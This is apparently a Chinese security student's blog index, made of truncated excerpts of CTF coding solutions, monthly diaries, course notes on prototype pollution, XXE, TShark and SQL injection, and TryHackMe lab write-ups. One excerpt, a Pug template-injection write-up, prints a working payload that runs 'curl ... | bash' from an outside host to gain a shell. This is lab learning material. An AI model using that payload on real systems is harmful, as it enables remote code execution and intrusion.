MikannseのSekai

x21将字节转换成千字节并保留两位小数，使用格式化字符串 data2=data2.decode()kb=int(data2)/1024data3=f"{kb:.2f}KB"print(data3)s.send(data3.encode()) x22chr来转成ascii码 data2=data2.decode()lists=data2.split()lists=map(int,lists)data3=''.join(chr(num)for num in lists)s.send(data3.encode()) x23和前几题一样，只不过变成了5个像素和多了转ascii码的步骤 import base64from io import BytesIOfrom PIL import Image data2=base64.b64decode(data2) Bimage=Image.open(BytesIO(data2)) data3=''.join(str(chr(Bimage.getdata()[i][-1]))for i in range(5)) print( ...

x11摩斯电码解码，使用字典的方式,题目所给的分隔符是空格 data2=data2.decode().split()def morse(message): MorseList = {".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G","....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N","---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T","..-": "U", "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z","-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",".....": "5", "-....": "6 ...

x00运行所给的代码,socket连接之后直接得到flag x01在第一关的基础上再额外发送一个字符串，添加 print('Receiving challenge.')data3 = s.recv(1024)print(data3)print('Envio reto')s.send(data3) 运行即可 x02需要全部大写 data3=data2.upper()s.send(data3) x03运用base64库进行base64解码 data3=base64.b64decode(data2)s.send(data3) x04字符串逆序 data3=data2[::-1]s.send(data3) x05取倒数5个字符 data3=data2[-5:]s.send(data3) x06len取到的是int，先str转成字符再encode成bytes来发送 data3= str(len(data2))print(data3)s.send(data3.encode()) x07先进行hex解码转换为字节，再转换成ascii字符 data3= bytes.fromhex(data ...

6月的前期还是比较闲比较摆烂的，然后开始打的闽盾和ciscn的那个周末还是比较累的，高强度，但也比较开心。收获颇多，最后的结果仍不太满意。java,nodejs等等还需要进一步地学习。打完就一直摆烂了，直到期末考前才开始复习(心虚。然后还再考虑和纠结hvv的事情。6月筹备的新的曲子还是比较满意的，7月大概能够完成吧,这个博客也开了一年了。7月再见吧

Introduction在网络安全这个令人激动的世界里，黑客和渗透测试人员四处寻找漏洞，一个不断发展的概念被称为原型污染。这允许不良行为者操纵和利用 JavaScript 应用程序的内部工作原理，并使攻击者能够访问敏感数据和应用程序后端。 虽然原型污染最常在 JavaScript 环境中讨论，但该概念可以应用于使用类似基于原型的继承模型的任何系统。 然而，JavaScript 的广泛使用，特别是在 Web 开发中，以及其灵活而动态的对象模型，使原型污染成为这种语言中更突出和更相关的问题。相比之下，基于类的继承语言（如 Java 或 C++）具有不同的继承模型，其中类（对象的蓝图）通常是静态的，并且在运行时更改类以影响其所有实例并不是常见的做法或简单的任务。 学习目标通过本课程，您将全面了解以下关键概念： 原型污染的工作原理对 Web 应用程序的潜在风险利用技术（客户端和服务器端）缓解技术 学习前提条件建议在开始本课程之前了解以下主题： 网站的工作方式HTTP 协议和方法OWASP 十大 Web 漏洞 Essential Recap在我们深入讨论原型污染等高级内容之前，让我们先了解 J ...

IntroductionXXE（XML 外部实体）注入是一种利用应用程序 XML 输入中的漏洞的安全漏洞。当应用程序接受包含 XML 本身中的外部实体引用的 XML 输入时，就会发生这种情况。攻击者可以利用此漏洞泄露本地文件、发出服务器端请求或执行远程代码。 鉴于 XML 在 Web 应用程序中的广泛使用，特别是在 Web 服务和基于 SOAP 的 API 中，这些漏洞的严重性不容小觑。 目标 认识与 XXE 注入相关的基本概念和危险。 识别易受攻击的 XML 处理配置和实践。 开发用于检测、利用和缓解应用程序中 XXE 漏洞的技术。 先决条件 了解 XML 文档的结构，包括标签、属性和实体引用。 熟悉 Web 应用程序如何处理输入和管理数据。 对 OWASP ZAP 或 Burp Suite 有基本了解。 Exploring XML什么是 XML？XML（可扩展标记语言）是一种标记语言，源自 SGML（标准通用标记语言），与 HTML 所基于的标准相同。应用程序通常使用 XML 以人可读且机器可解析的格式存储和传输数据。它是一种灵活且广泛使用的格式，用于在不同系统和应用程序之间交换数 ...

IntroductionTShark 是一个开源命令行网络流量分析器。它由 Wireshark 开发人员创建，具有 Wireshark 的大部分功能。它通常用作 Wireshark 的命令行版本。但是，它也可以像 tcpdump 一样使用。因此，它是进行全面数据包评估的首选。 学习目标 使用 TShark 过滤流量在 TShark 中实现 Wireshark 过滤器使用 TShark 扩展和自动化数据包过滤 Command-Line Packet Analysis Hints | TShark and Supplemental CLI Tools命令行数据包分析提示 TShark 是一种基于文本的工具，适用于数据雕刻、深入的数据包分析和使用脚本的自动化。这种优势和灵活性源自 CLI 工具的本质，因为生成/处理的数据可以流水线传输到其他工具。数据包分析中最常用的工具如下。 工具/实用程序 目的和好处 capinfos 提供指定捕获文件详细信息的程序。建议在开始调查之前查看捕获文件的摘要。 grep 帮助搜索纯文本数据。 cut 帮助从指定数据源剪切部分行。 uni ...

IntroductionSQL 注入仍然是 Web 应用程序最严重和最普遍的安全漏洞之一。当攻击者利用 Web 应用程序执行任意 SQL 查询的能力时，就会出现这种威胁，从而导致未经授权访问数据库、数据泄露、数据操纵甚至完全控制应用程序。在这个房间里，我们将了解高级 SQL 注入技术，全面了解复杂的攻击媒介和缓解策略。 在本房间结束时，您将对各种 SQL 注入技术有更深入的了解。这将使您具备在多种情况下识别和利用这些漏洞的技能，并实施强大的防御措施来保护您的应用程序。 学习目标 通过本课程，您将全面了解以下关键概念： 二阶 SQL 注入 过滤规避 带外 SQL 注入 自动化技术 缓解措施 学习前提条件 建议在开始本课程之前了解以下主题： SQL 注入 SQLMAP OWASP Top 10 Nmap 在深入研究之前，清楚了解目标机器的数据库版本和操作系统详细信息至关重要。为此，我们可以利用强大的网络扫描工具 Nmap 彻底扫描 10.10.20.127。此扫描将提供有关开放端口、正在运行的服务和目标机器操作系统的宝贵见解。对于那些不熟悉 Nmap 的人，我们建议查看我们全面的 ...

PUG模板SSTI根据房间提示，是Nodejs的PUG模板SSTI 根据: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection 尝试payload #{7*7} 返回49,存在SSTI,在本地写一个反弹shell然后开启web服务器，开启监听 #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl http://10.11.77.28:8000/s.sh | bash')}()} 拿到shell app.js源码: const express = require("express")const pug = require("pug")var bodyParser = require("body-parser")const app = express()app.set("view engine", "pug")app.us ...

端口扫描靶机没有开启ping └─# nmap --min-rate=10000 -p- exf.thmStarting Nmap 7.93 ( https://nmap.org ) at 2024-06-05 16:39 UTCNmap scan report for exf.thm (10.10.65.115)Host is up (0.0036s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE80/tcp open http3389/tcp open ms-wbt-server5985/tcp open wsmanMAC Address: 02:D8:FF:08:7D:81 (Unknown)Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds └─# nmap -sC -sT -sV -O -p80,3389,5985 exf.thmStarting Nmap 7.93 ( https: ...

端口扫描└─# nmap --min-rate=10000 -p- worldwap.thmStarting Nmap 7.93 ( https://nmap.org ) at 2024-06-04 08:31 UTCNmap scan report for worldwap.thm (10.10.174.96)Host is up (0.0086s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http8081/tcp open blackice-icecapMAC Address: 02:A6:09:94:BB:73 (Unknown)Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds └─# nmap -sT -sV -sC -O -p22,80,8081 worldwap.thmStarting Nmap 7.93 ( https://nmap. ...

五月的前半段还是比较忙的，省护，期中考，ciscn。后半段就属于摸鱼摆烂时期了，也算是闲下来了休息了一段时间。反而有一些无所适从，还剩最后一个月大二就要结束了。今天是六一了呢，在之前还会想关于儿童成人之类的话题，不过现在已经无所谓了。因为事实上并不是与之相关。以后也一直会如此，有些事情必须要去做。